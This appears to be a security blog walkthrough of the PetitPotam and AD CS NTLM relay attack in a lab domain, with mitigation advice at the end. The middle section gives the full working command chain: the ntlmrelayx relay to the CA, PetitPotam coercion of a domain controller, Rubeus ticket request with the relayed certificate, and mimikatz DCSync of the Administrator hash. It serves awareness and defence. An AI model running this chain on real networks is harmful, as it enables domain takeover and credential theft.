In this post I walk through the recently announced PetitPotam and Active Directory Certificate Services (AD CS) NTLM relay attack. My hope is to raise awareness of the attack and offer some practical mitigations for the vulnerability.



Following on from the recent work by SpecterOps, which identified various attack paths within Active Directory Certificate Services/Certificate Authority (AD CS/CA), ExAndroidDev carried out some further fine work on the ntlmrelayx.py script to allow targeting of a CA. This was subsequently submitted as a pull request to the SecureAuthCorp Impacket master branch. It essentially allows credentials to be relayed to the CA's web enrolment service, resulting in a Base64-encoded certificate for the template you specify. The certificate can then be imported into Rubeus or kekeo to request a Kerberos ticket, which can be used in pass-the-ticket style attacks and ultimately for actions such as DCSync.

The modified version of Impacket’s ntlmrelayx.py is a little different to the master branch. Whether we git clone the master branch and switch to the specific commit or use ExAndroidDev’s version, we will most likely want to isolate the install, as we don’t want to mess with our known-good working install within Kali. It is therefore wise to install and run the newer version in a Python virtual environment. Let’s get started:

sudo apt-get install python3-venv # install the venv module

mkdir python-virtual-environments && cd python-virtual-environments # create a directory for your venvs

python3 -m venv env1 # create a venv called env1 (no sudo, so the files stay owned by your user)

source env1/bin/activate # activate env1 to use it

cd env1

git clone https://github.com/ExAndroidDev/impacket.git

cd impacket

python setup.py install # installing in the env1 will ensure you don't mess up your original install

cd impacket/examples
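Since the whole point of the steps above is isolation, it can be worth confirming that the interpreter in use really belongs to env1 before relying on it. The following is a minimal sketch; the helper name `in_virtualenv` is my own and not part of Impacket:

```python
import sys


def in_virtualenv() -> bool:
    """Return True when the running interpreter belongs to a venv."""
    # Inside a venv, sys.prefix points at the venv directory while
    # sys.base_prefix still points at the system-wide Python install.
    return sys.prefix != getattr(sys, "base_prefix", sys.prefix)


if __name__ == "__main__":
    state = "inside" if in_virtualenv() else "NOT inside"
    print(f"{state} a virtual environment (sys.prefix = {sys.prefix})")
```

Run it with the same `python` you used for `setup.py install`; if it reports that you are not inside a virtual environment, the activate step was probably skipped in that terminal.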





For my lab I used a similar setup to the below:







Using the new ntlmrelayx.py we can set up the NTLM relay as below:

ntlmrelayx.py -t http://10.0.1.20/certsrv/certfnsh.asp -smb2support --adcs -template "kerberosAuthentication"

What this is effectively doing is setting up a relay server, ready for credentials to be squirted on to the CA. Getting those credentials to arrive at the relay can be achieved in a number of ways, for example using Responder or mitm6, as well as the newly released tool/script PetitPotam.



Enter PetitPotam. This newly found attack vector allows us to coerce a Windows host into authenticating to another computer (in the form of NTLM), in this case our relay server. This is done by eliciting a response from a machine through SMB port 445 against the Encrypting File System Remote (EFSRPC) Protocol service, using a specific named pipe, LSARPC, with interface c681d488-d850-11d0-8c52-00c04fd90f7e. Looking into the PetitPotam Python script we can see it tries to make a binding with the following pipes:

This essentially allows a computer account to authenticate to another computer account on the same domain, via the MS-EFSRPC EfsRpcOpenFileRaw function, through the relay. More in-depth information regarding MS-EFSRPC, the Encrypting File System Remote (EFSRPC) Protocol, can be found here: https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-efsr/08796ba8-01c8-4872-9221-1000ec2eff31 .
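To make the "named pipe plus interface" idea a little more concrete, here is a small sketch of how such an endpoint is usually written as a DCE/RPC string binding (`protocol:host[endpoint]`). It only covers the LSARPC pipe and the interface UUID quoted above; the function name `named_pipe_binding` is hypothetical, and the sketch builds a string only, it does not talk to any host:

```python
import uuid

# Interface UUID quoted in the text above.
EFSRPC_LSARPC_UUID = uuid.UUID("c681d488-d850-11d0-8c52-00c04fd90f7e")


def named_pipe_binding(target: str, pipe: str = "lsarpc") -> str:
    """Build a DCE/RPC string binding for a named pipe reached over SMB."""
    # Reject values that would break the protocol:host[endpoint] layout.
    if not target or any(ch in target for ch in "[] "):
        raise ValueError(f"unexpected target: {target!r}")
    # ncacn_np = "connection-oriented RPC over named pipes", i.e. via SMB.
    return r"ncacn_np:%s[\PIPE\%s]" % (target, pipe)


if __name__ == "__main__":
    # 10.0.1.129 is the lab DC address used later in this post.
    print(named_pipe_binding("10.0.1.129"))
    print("interface:", EFSRPC_LSARPC_UUID)
```

An RPC client library would take a binding like this, connect over port 445, and then bind to the interface UUID before calling EfsRpcOpenFileRaw.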

The main requirement to note here is that the NTLM credentials must be sent from the authenticated position to the relay (DC to relay). This could be from an already phished computer or simply by relying on Responder. The second main point is that this can now be elicited from an unauthenticated position with PetitPotam.

We will go ahead and git clone the PetitPotam code:

git clone https://github.com/topotam/PetitPotam.git



The PetitPotam vulnerability can be identified with a basic unauthenticated Nessus scan (plugin ID 152102, CVSS v3.0 Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H)
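The CVSS vector above packs a lot into a short string, so a quick way to read it is to split it into its metrics. This is a minimal sketch; `parse_cvss_vector` is a helper written for this post, not part of Nessus or any CVSS library, and it does not compute a score:

```python
def parse_cvss_vector(vector: str) -> dict:
    """Split a CVSS v3.x vector string into its version and metrics."""
    prefix, *parts = vector.strip().split("/")
    scheme, _, version = prefix.partition(":")
    if scheme != "CVSS" or not version:
        raise ValueError(f"not a CVSS vector: {vector!r}")
    metrics = {}
    for part in parts:
        key, sep, value = part.partition(":")
        if not (key and sep and value):
            raise ValueError(f"malformed metric: {part!r}")
        metrics[key] = value
    return {"version": version, "metrics": metrics}


# The vector reported by the Nessus plugin mentioned above.
VECTOR = "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H"
parsed = parse_cvss_vector(VECTOR)
m = parsed["metrics"]

# Network reachable, no privileges required, no user interaction needed.
remote_unauthenticated = (m["AV"], m["PR"], m["UI"]) == ("N", "N", "N")

if __name__ == "__main__":
    print(parsed)
    print("remote and unauthenticated:", remote_unauthenticated)
```

Read this way, the vector says: reachable over the network (AV:N), low complexity (AC:L), no privileges (PR:N), no user interaction (UI:N), changed scope (S:C), and high impact on confidentiality, integrity and availability.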































A vulnerable Certificate Authority is one that is running HTTP rather than HTTPS, accepts NTLM authentication, and has at least one published template that allows client authentication, such as the Kerberos Authentication template. The AD CS role is normally (in my experience) installed on a DC in smaller environments, or on a standalone member server. This can be verified by accessing port 80 on a DC or suspected CA, authenticating at the login prompt with a low-privileged user, and verifying that it’s the CA enrolment page.
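Two of the conditions above (plain HTTP, and NTLM on offer) are visible from the outside without logging in, because the server advertises its authentication schemes in the `WWW-Authenticate` header of its 401 response. The sketch below uses only the Python standard library; the function names are my own, and it deliberately says nothing about which templates are published. It only flags an explicit `NTLM` offer; a server offering just `Negotiate` may or may not still accept NTLM, which this check cannot tell.

```python
import urllib.error
import urllib.request


def offered_schemes(www_authenticate_values):
    """Return the lower-cased scheme names from WWW-Authenticate values."""
    schemes = set()
    for value in www_authenticate_values:
        token = value.strip().split(" ", 1)[0]
        if token:
            schemes.add(token.lower())
    return schemes


def looks_relayable(url, www_authenticate_values):
    """True when the URL is plain HTTP and NTLM is explicitly offered."""
    is_plain_http = url.lower().startswith("http://")
    return is_plain_http and "ntlm" in offered_schemes(www_authenticate_values)


def probe(url, timeout=5.0):
    """Request url without credentials; return its WWW-Authenticate values."""
    try:
        with urllib.request.urlopen(url, timeout=timeout) as resp:
            return resp.headers.get_all("WWW-Authenticate") or []
    except urllib.error.HTTPError as err:
        # A 401 is the expected answer from a protected enrolment page.
        return err.headers.get_all("WWW-Authenticate") or []


if __name__ == "__main__":
    target = "http://10.0.1.20/certsrv/"  # lab CA address from this post
    print(looks_relayable(target, probe(target)))
```

Only point this at systems you are authorised to test; it sends a single unauthenticated GET request.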

Back to our exploit:



As PetitPotam requires Impacket, we will use our Python virtual environment. In a second terminal we run the PetitPotam script like below:



python3 petitpotam.py 10.0.1.153 10.0.1.129

Where the first IP address is the relay server and the second is the AD server (not your AD CS).





As you will see from my lab, I received an error message saying ‘something went wrong…’; however, this still seemed to work just fine. We know this because we can see the DC sending an authentication request into the ntlmrelayx tool, and then on to the AD CS, like below:









We can see that our authentication as the DC1$ machine account against the CA succeeded. A Certificate Signing Request (CSR) is generated and a Base64 certificate is received for what appears to be the DC1$ machine account. Oh dear.





Next we’ll take this Base64 cert and use it with Rubeus to request a Ticket Granting Ticket (TGT). This needs to be run in a security context associated with the domain; in this case I have used a low-privileged domain user account ‘securecorp.uk\ted’ in a ‘runas /netonly’ session from my Windows attack VM:

runas /netonly /user:securecorp.uk\ted "cmd.exe /k"

Then with Rubeus…

rubeus.exe asktgt /user:dc1$ /ptt /certificate:MIIRbQIBAzCCET.....
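Before pasting a long Base64 blob into Rubeus, it can help to sanity-check that it decodes to what we expect. The blob above starts with `MIIR...`, which decodes to a DER SEQUENCE followed by the integer 3, the shape of a PKCS#12 (PFX) container. The sketch below only inspects those first few bytes; `pfx_header_info` is a hypothetical helper, it does not parse or validate the certificate itself, and the sample value is just the first 12 characters of the truncated string shown above:

```python
import base64


def pfx_header_info(b64_blob: str) -> dict:
    """Inspect the first DER bytes of a Base64 blob for a PKCS#12 header."""
    raw = base64.b64decode(b64_blob)
    if len(raw) < 2 or raw[0] != 0x30:  # 0x30 = DER SEQUENCE tag
        raise ValueError("blob does not start with a DER SEQUENCE")
    first_len = raw[1]
    if first_len & 0x80:
        # Long form: the low 7 bits give the number of length bytes.
        n = first_len & 0x7F
        if n == 0 or len(raw) < 2 + n:
            raise ValueError("unsupported or truncated DER length")
        declared = int.from_bytes(raw[2:2 + n], "big")
        offset = 2 + n
    else:
        declared = first_len
        offset = 2
    # A PFX begins with INTEGER 3 (tag 0x02, length 0x01, value 0x03).
    is_v3 = raw[offset:offset + 3] == b"\x02\x01\x03"
    return {"declared_length": declared, "looks_like_pkcs12_v3": is_v3}


# First 12 characters of the (truncated) certificate string shown above.
SAMPLE_PREFIX = "MIIRbQIBAzCC"

if __name__ == "__main__":
    print(pfx_header_info(SAMPLE_PREFIX))
```

If `looks_like_pkcs12_v3` comes back false for your full blob, the copy and paste most likely dropped or mangled characters at the start.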



If we look at our tickets on our Windows Attack VM using ‘klist’ we see the following ticket for dc1$:





With the correct ticket now in hand we can DCSync the Administrator account with mimikatz (still in the same security context):

lsadump::dcsync /user:Administrator /domain:securecorp.uk



With the NTLM hash now firmly in our possession we can attempt to crack it, or simply Pass the Hash (PtH) with various other tools such as wmiexec.py.

Recommendations:

There are several different aspects to consider with this chained attack. The following options should be considered and, importantly, tested within your own environment to ensure they suit your needs. Microsoft has also published mitigation guidance in KB5005413: https://support.microsoft.com/en-gb/topic/kb5005413-mitigating-ntlm-relay-attacks-on-active-directory-certificate-services-ad-cs-3612b773-4043-4aa9-b23d-b87910cd3429

















• Disable incoming NTLM authentication using GPO “Network security: Restrict NTLM: Incoming NTLM traffic”.





• Configure IIS to use Kerberos authentication only by removing NTLM authentication and setting Windows Authentication to Negotiate:Kerberos.







• Use HTTPS instead of HTTP for IIS on the CA.

• Consider enabling Extended Protection for Authentication (EPA) for clients and server https://msrc-blog.microsoft.com/2009/12/08/extended-protection-for-authentication/.

Useful References:

https://github.com/topotam/PetitPotam

https://posts.specterops.io/certified-pre-owned-d95910965cd2

https://github.com/SecureAuthCorp/impacket/pull/1101

https://www.youtube.com/watch?v=wJXTg4mK_dI

https://github.com/ExAndroidDev/impacket/tree/ntlmrelayx-adcs-attack

https://www.exandroid.dev/2021/06/23/ad-cs-relay-attack-practical-guide/